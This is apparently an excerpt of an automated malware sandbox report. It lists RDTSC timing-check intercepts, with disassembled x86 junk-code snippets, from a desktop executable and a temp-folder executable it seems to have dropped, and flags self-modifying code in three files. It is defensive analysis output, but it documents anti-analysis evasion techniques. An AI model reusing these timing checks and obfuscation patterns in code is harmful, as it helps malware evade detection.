Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290F15 second address: 5290F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0A90 second address: 52A0A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0A96 second address: 52A0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0A9A second address: 52A0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f pushad 0x00000010 movsx ebx, cx 0x00000013 call 00007F988D0B0296h 0x00000018 movzx eax, dx 0x0000001b pop ebx 0x0000001c popad 0x0000001d je 00007F98FE75E1BDh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AD4 second address: 52A0AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AD8 second address: 52A0ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0ADC second address: 52A0AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AE2 second address: 52A0AE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0AE8 second address: 52A0AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0B44 second address: 52A0B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 58123C59h 0x0000000b pushad 0x0000000c mov ecx, edi 0x0000000e mov ax, bx 0x00000011 popad 0x00000012 add dword ptr [esp], 1E885FCFh 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F988D0B0294h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0B73 second address: 52A0BAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F98FDE83306h 0x0000000e push 76952B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [769B4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 pushad 0x00000054 jmp 00007F988C7CE31Bh 0x00000059 popad 0x0000005a sub esi, esi 0x0000005c jmp 00007F988C7CE31Fh 0x00000061 mov dword ptr [ebp-1Ch], esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BAD second address: 52A0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BD7 second address: 52A0BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BDD second address: 52A0BFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0BFE second address: 52A0C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C02 second address: 52A0C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C06 second address: 52A0C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C0C second address: 52A0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0299h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C29 second address: 52A0C45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F98FDE7206Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov esi, 517075A5h 0x00000016 mov esi, 3117C721h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52A0C45 second address: 52A0C6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B028Dh 0x00000009 or cx, CDF6h 0x0000000e jmp 00007F988D0B0291h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0933 second address: 52C094C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov cl, 81h 0x00000007 popad 0x00000008 push ebp 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d mov bh, CBh 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C094C second address: 52C0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0950 second address: 52C0954 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0954 second address: 52C095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C095A second address: 52C095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C095F second address: 52C09A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov di, 1318h 0x00000011 mov edi, 072B48C4h 0x00000016 popad 0x00000017 popad 0x00000018 push esi 0x00000019 pushad 0x0000001a mov eax, 2138DB65h 0x0000001f mov bl, ah 0x00000021 popad 0x00000022 mov dword ptr [esp], esi 0x00000025 jmp 00007F988D0B028Dh 0x0000002a mov esi, dword ptr [ebp+0Ch] 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F988D0B028Dh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09A3 second address: 52C09C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F988C7CE31Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09C9 second address: 52C09D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09D9 second address: 52C09F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F98FDE5BCE3h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, di 0x00000017 push edi 0x00000018 pop ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09F9 second address: 52C09FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09FE second address: 52C0AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [769B459Ch], 05h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F988C7CE31Dh 0x00000018 sub cl, FFFFFF86h 0x0000001b jmp 00007F988C7CE321h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F988C7CE320h 0x00000027 jmp 00007F988C7CE325h 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F98FDE73D52h 0x00000034 pushad 0x00000035 push ecx 0x00000036 pushfd 0x00000037 jmp 00007F988C7CE323h 0x0000003c adc ecx, 3D75801Eh 0x00000042 jmp 00007F988C7CE329h 0x00000047 popfd 0x00000048 pop eax 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0AA0 second address: 52C0AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0AA4 second address: 52C0AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B50 second address: 52C0B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B64 second address: 52C0B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B68 second address: 52C0B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B79 second address: 52C0B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0BAA second address: 52C0BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0BBA second address: 52C0BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F988C7CE327h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F988C7CE325h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: B1E59B second address: B1E5CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F988D0B0296h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: B1E5CE second address: B1E5D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA528 second address: CAA52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA52C second address: CAA54A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 jbe 00007F988C7CE316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA54A second address: CAA55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F988D0B0286h 0x0000000d jp 00007F988D0B0286h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA55D second address: CAA567 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988C7CE316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA96E4 second address: CA96EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F988D0B0286h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA96EE second address: CA9709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE327h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA999D second address: CA99D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b ja 00007F988D0B029Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA99D4 second address: CA99DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD04F second address: CAD064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0291h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD225 second address: CAD269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F988C7CE316h 0x00000009 jmp 00007F988C7CE324h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F988C7CE329h 0x00000018 pushad 0x00000019 jbe 00007F988C7CE316h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD399 second address: CAD39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD39D second address: CAD3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: C8FCD3 second address: C8FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F988D0B0286h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCBA7E second address: CCBA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F988C7CE316h 0x0000000a popad 0x0000000b jbe 00007F988C7CE318h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCBA91 second address: CCBA9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F988D0B0286h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCBA9E second address: CCBAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F988C7CE31Dh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC013 second address: CCC02D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0296h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC02D second address: CCC033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC4A2 second address: CCC4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC88C second address: CCC893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC9B5 second address: CCC9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD075 second address: CCD087 instructions: 0x00000000 rdtsc 0x00000002 js 00007F988C7CE31Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD087 second address: CCD08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD2EB second address: CCD2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD2EF second address: CCD311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F988D0B0299h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD2E95 second address: CD2ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE323h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F988C7CE323h 0x00000014 jnc 00007F988C7CE316h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD2ED2 second address: CD2EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F988D0B0296h 0x0000000b popad 0x0000000c jmp 00007F988D0B028Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD4E0A second address: CD4E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD4E10 second address: CD4E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988D0B028Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD3C10 second address: CD3C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD568A second address: CD569B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B2C second address: CD8B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B32 second address: CD8B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988D0B0296h 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007F988D0B0286h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F988D0B0292h 0x00000017 ja 00007F988D0B0286h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B75 second address: CD8B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE328h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B91 second address: CD8BA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F988D0B0286h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BA1 second address: CD8BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BA5 second address: CD8BBB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F988D0B0286h 0x00000008 jo 00007F988D0B0286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BBB second address: CD8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BBF second address: CD8BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BC3 second address: CD8BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 76EB8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 913A9A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 93DB4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 928E15 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 76EAC4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9A2BCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: B1DDF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: CD3DB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: CFF7D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: B1DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: D6F7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 101775A instructions caused by: Self-modifying code
